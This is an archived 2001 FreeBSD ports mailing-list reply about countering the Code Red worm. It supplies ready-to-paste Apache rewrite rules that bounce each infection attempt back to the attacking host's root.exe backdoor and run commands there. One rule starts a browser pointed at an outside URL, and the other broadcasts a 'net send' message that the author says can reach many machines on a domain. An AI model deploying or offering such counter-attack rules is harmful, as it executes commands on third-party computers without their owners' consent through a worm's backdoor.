From owner-freebsd-ports Mon Sep 10 15: 0:14 2001 Delivered-To: freebsd-ports@freebsd.org Received: from mail.fdma.com (mail.fdma.com [216.241.67.73]) by hub.freebsd.org (Postfix) with ESMTP id 0E56237B401 for ; Mon, 10 Sep 2001 15:00:11 -0700 (PDT) Received: from MIKELT (mikelt.fdma.lan [10.1.1.40]) by mail.fdma.com (8.11.3/8.11.3) with SMTP id f8AM04U66032 for ; Mon, 10 Sep 2001 18:00:04 -0400 (EDT) Message-ID: <010e01c13a5d$0a208f00$2801010a@MIKELT> From: "Michael Scheidell" To: References: <3B98DCF5.5851.5521A430@localhost> Subject: Re: Apache::CodeRed : anyone thought of porting it? Date: Mon, 10 Sep 2001 17:59:41 -0700 Organization: Florida Datamation, Inc. MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ----- Original Message ----- From: ""Dan Langille"" Newsgroups: local.freebsd.ports Sent: Friday, September 07, 2001 11:43 AM Subject: Apache::CodeRed : anyone thought of porting it? > Has anyone thought of porting Apache::CodeRed? See > http://www.onlamp.com/pub/a/apache/2001/08/16/code_red.html for details. other option is to use apache rewrite module and use tne same 'sploit to send a net popup or start a copy of ie (note, if using virtual servers, you will wan this on the default one.. the one hit when looking at the ip address) no wraps on this, put this in /usr/local/etc/apache/httpd.conf and restart apache. Rewriteengine on no wraps below (one line) RewriteRule ^(.*)/default.ida(.*) http://%{REMOTE_ADDR}/c/inetpub/scripts/root. exe?/c+start+http://24.17.180.183/anticodered.html or this (if you want to send a net popup to hundreds,maybe thousands of systems on the same domain: Rewriteengine on RewriteRule ^(.*)/default.ida(.*) http://%{REMOTE_ADDR}/c/inetpub/scripts/root. exe?/c+net+send+*+Your+computer+is+infected+by+a+Code+Red+Worm.+I+did+not+in fect+you.+This+is+a+courtesy+response+generated+when+your+computer+attempted +to+infect+mine.+Your+computer+is+completely+exposed.+Visit+http://www.dynwe bdev.com/codered/alert.htm+immediately. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message